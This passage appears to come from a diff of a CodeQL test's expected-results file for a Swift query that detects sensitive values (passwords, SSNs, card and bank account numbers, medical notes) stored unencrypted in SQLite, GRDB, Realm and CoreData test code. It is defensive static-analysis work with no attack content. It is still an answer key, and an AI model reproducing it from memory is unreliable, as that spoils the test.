testGRDB.swift:153:66:153:66 | password | password | +| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:155:66:155:66 | password | password | +| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password | password | +| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password | password | +| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password | password | +| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password | password | +| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password | password | +| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password | password | +| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:173:57:173:57 | password | password | +| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password | password | +| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password | password | +| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password | password | +| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password | password | +| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password | password | +| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password | password | +| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:188:48:188:48 | password | password | +| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password | password | +| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password | password | +| testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password | password | +| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password | password | +| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password | password | +| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password | testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password | password | +| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:210:85:210:85 | password | password | +| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password | password | +| testRealm2.swift:18:2:18:2 | o | testRealm2.swift:18:11:18:11 | myPassword | testRealm2.swift:18:2:18:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:18:11:18:11 | myPassword | myPassword | +| testRealm2.swift:24:2:24:2 | o | testRealm2.swift:24:11:24:11 | socialSecurityNumber | testRealm2.swift:24:2:24:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:24:11:24:11 | socialSecurityNumber | socialSecurityNumber | +| testRealm2.swift:25:2:25:2 | o | testRealm2.swift:25:11:25:11 | ssn | testRealm2.swift:25:2:25:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:25:11:25:11 | ssn | ssn | +| testRealm2.swift:26:2:26:2 | o | testRealm2.swift:26:18:26:18 | ssn_int | testRealm2.swift:26:2:26:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:26:18:26:18 | ssn_int | ssn_int | +| testRealm2.swift:32:2:32:2 | o | testRealm2.swift:32:11:32:11 | creditCardNumber | testRealm2.swift:32:2:32:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:32:11:32:11 | creditCardNumber | creditCardNumber | +| testRealm2.swift:33:2:33:2 | o | testRealm2.swift:33:11:33:11 | CCN | testRealm2.swift:33:2:33:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. 
| testRealm2.swift:33:11:33:11 | CCN | CCN | +| testRealm2.swift:34:2:34:2 | o | testRealm2.swift:34:18:34:18 | int_ccn | testRealm2.swift:34:2:34:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:34:18:34:18 | int_ccn | int_ccn | +| testRealm.swift:41:2:41:2 | a | testRealm.swift:41:11:41:11 | myPassword | testRealm.swift:41:2:41:2 | [post] a | This operation stores 'a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:41:11:41:11 | myPassword | myPassword | +| testRealm.swift:49:2:49:2 | c | testRealm.swift:49:11:49:11 | myPassword | testRealm.swift:49:2:49:2 | [post] c | This operation stores 'c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:49:11:49:11 | myPassword | myPassword | +| testRealm.swift:59:2:59:3 | ...! | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:59:2:59:3 | [post] ...! | This operation stores '...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:59:12:59:12 | myPassword | myPassword | +| testRealm.swift:66:2:66:2 | g | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:66:2:66:2 | [post] g | This operation stores 'g' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:66:11:66:11 | myPassword | myPassword | +| testRealm.swift:73:2:73:2 | h | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:73:2:73:2 | [post] h | This operation stores 'h' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:73:15:73:15 | myPassword | myPassword | edges | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | provenance | | | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | provenance | | 
@@ -622,143 +762,3 @@ subpaths | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:27:6:27:6 | value | testRealm.swift:27:6:27:6 | self [Return] [data] | testRealm.swift:59:2:59:3 | [post] ...! | | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:27:6:27:6 | value | testRealm.swift:27:6:27:6 | self [Return] [data] | testRealm.swift:66:2:66:2 | [post] g | | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:34:6:34:6 | value | testRealm.swift:34:6:34:6 | self [Return] [password] | testRealm.swift:73:2:73:2 | [post] h | -#select -| SQLite.swift:123:17:123:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:124:17:124:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:124:17:124:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:127:21:127:21 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:128:21:128:21 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:128:21:128:21 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:131:17:131:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:131:17:131:17 | insertQuery | This operation stores 'insertQuery' in a database. 
It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:132:17:132:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:132:17:132:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:135:20:135:20 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:135:20:135:20 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:136:20:136:20 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:136:20:136:20 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:139:24:139:24 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:139:24:139:24 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:140:24:140:24 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:140:24:140:24 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:147:32:147:32 | [...] | SQLite.swift:147:32:147:32 | mobilePhoneNumber | SQLite.swift:147:32:147:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:147:32:147:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:148:28:148:28 | [...] | SQLite.swift:148:28:148:28 | mobilePhoneNumber | SQLite.swift:148:28:148:28 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:148:28:148:28 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:149:31:149:31 | [...] | SQLite.swift:149:31:149:31 | mobilePhoneNumber | SQLite.swift:149:31:149:31 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:149:31:149:31 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:152:21:152:21 | [...] | SQLite.swift:152:21:152:21 | mobilePhoneNumber | SQLite.swift:152:21:152:21 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:152:21:152:21 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:153:20:153:20 | [...] | SQLite.swift:153:20:153:20 | mobilePhoneNumber | SQLite.swift:153:20:153:20 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:153:20:153:20 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:154:23:154:23 | [...] | SQLite.swift:154:23:154:23 | mobilePhoneNumber | SQLite.swift:154:23:154:23 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:154:23:154:23 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:158:32:158:54 | [...] | SQLite.swift:158:33:158:33 | mobilePhoneNumber | SQLite.swift:158:32:158:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:158:33:158:33 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:159:28:159:50 | [...] | SQLite.swift:159:29:159:29 | mobilePhoneNumber | SQLite.swift:159:28:159:50 | [...] | This operation stores '[...]' in a database. 
It may contain unencrypted sensitive data from $@. | SQLite.swift:159:29:159:29 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:160:31:160:53 | [...] | SQLite.swift:160:32:160:32 | mobilePhoneNumber | SQLite.swift:160:31:160:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:160:32:160:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:163:21:163:43 | [...] | SQLite.swift:163:22:163:22 | mobilePhoneNumber | SQLite.swift:163:21:163:43 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:163:22:163:22 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:164:20:164:42 | [...] | SQLite.swift:164:21:164:21 | mobilePhoneNumber | SQLite.swift:164:20:164:42 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:164:21:164:21 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:165:23:165:45 | [...] | SQLite.swift:165:24:165:24 | mobilePhoneNumber | SQLite.swift:165:23:165:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:165:24:165:24 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:169:32:169:70 | [...] | SQLite.swift:169:53:169:53 | mobilePhoneNumber | SQLite.swift:169:32:169:70 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:169:53:169:53 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:170:28:170:66 | [...] | SQLite.swift:170:49:170:49 | mobilePhoneNumber | SQLite.swift:170:28:170:66 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:170:49:170:49 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:171:31:171:69 | [...] 
| SQLite.swift:171:52:171:52 | mobilePhoneNumber | SQLite.swift:171:31:171:69 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:171:52:171:52 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:174:21:174:59 | [...] | SQLite.swift:174:42:174:42 | mobilePhoneNumber | SQLite.swift:174:21:174:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:174:42:174:42 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:175:20:175:58 | [...] | SQLite.swift:175:41:175:41 | mobilePhoneNumber | SQLite.swift:175:20:175:58 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:175:41:175:41 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:176:23:176:61 | [...] | SQLite.swift:176:44:176:44 | mobilePhoneNumber | SQLite.swift:176:23:176:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:176:44:176:44 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:186:40:186:54 | [...] | SQLite.swift:186:54:186:54 | mobilePhoneNumber | SQLite.swift:186:40:186:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:186:54:186:54 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:189:26:189:40 | [...] | SQLite.swift:189:40:189:40 | mobilePhoneNumber | SQLite.swift:189:26:189:40 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:189:40:189:40 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:191:27:191:41 | [...] | SQLite.swift:191:41:191:41 | mobilePhoneNumber | SQLite.swift:191:27:191:41 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| SQLite.swift:191:41:191:41 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:193:26:193:89 | [...] | SQLite.swift:193:72:193:72 | mobilePhoneNumber | SQLite.swift:193:26:193:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:193:72:193:72 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:199:30:199:30 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:199:30:199:30 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:201:54:201:54 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:201:54:201:54 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | -| sqlite3_c_api.swift:46:27:46:27 | insertQuery | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | sqlite3_c_api.swift:46:27:46:27 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | medicalNotes | -| sqlite3_c_api.swift:47:27:47:27 | updateQuery | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | sqlite3_c_api.swift:47:27:47:27 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | medicalNotes | -| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | This operation stores 'medicalNotes' in a database. It may contain unencrypted sensitive data from $@. 
| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | medicalNotes | -| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:37:16:37:16 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:50:2:50:10 | ...? 
| testCoreData2.swift:50:35:50:35 | bankAccountNo | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:52:2:52:10 | ...? | testCoreData2.swift:52:41:52:41 | bankAccountNo | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:60:4:60:4 | obj | testCoreData2.swift:60:30:60:30 | bankAccountNo | testCoreData2.swift:60:4:60:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:60:30:60:30 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:62:4:62:4 | obj | testCoreData2.swift:62:30:62:30 | bankAccountNo | testCoreData2.swift:62:4:62:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:62:30:62:30 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:65:3:65:3 | obj | testCoreData2.swift:65:29:65:29 | bankAccountNo | testCoreData2.swift:65:3:65:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:65:29:65:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:79:2:79:2 | dbObj | testCoreData2.swift:79:18:79:28 | .bankAccountNo | testCoreData2.swift:79:2:79:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData2.swift:79:18:79:28 | .bankAccountNo | .bankAccountNo | -| testCoreData2.swift:80:2:80:2 | dbObj | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | testCoreData2.swift:80:2:80:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | .bankAccountNo2 | -| testCoreData2.swift:82:2:82:2 | dbObj | testCoreData2.swift:82:18:82:18 | bankAccountNo | testCoreData2.swift:82:2:82:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:82:18:82:18 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:83:2:83:2 | dbObj | testCoreData2.swift:83:18:83:18 | bankAccountNo | testCoreData2.swift:83:2:83:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:83:18:83:18 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:84:2:84:2 | dbObj | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | testCoreData2.swift:84:2:84:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:85:2:85:2 | dbObj | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | testCoreData2.swift:85:2:85:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:87:2:87:10 | ...? | testCoreData2.swift:87:22:87:32 | .bankAccountNo | testCoreData2.swift:87:2:87:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:87:22:87:32 | .bankAccountNo | .bankAccountNo | -| testCoreData2.swift:88:2:88:10 | ...? 
| testCoreData2.swift:88:22:88:22 | bankAccountNo | testCoreData2.swift:88:2:88:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:88:22:88:22 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:89:2:89:10 | ...? | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | testCoreData2.swift:89:2:89:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:93:2:93:2 | dbObj | testCoreData2.swift:91:10:91:10 | bankAccountNo | testCoreData2.swift:93:2:93:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:91:10:91:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:98:2:98:2 | dbObj | testCoreData2.swift:95:10:95:10 | bankAccountNo | testCoreData2.swift:98:2:98:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:95:10:95:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:104:2:104:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:104:2:104:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:105:2:105:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:105:2:105:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | -| testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. 
It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password | password | -| testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | -| testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | -| testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | -| testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | -| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | -| testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x | x | -| testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. 
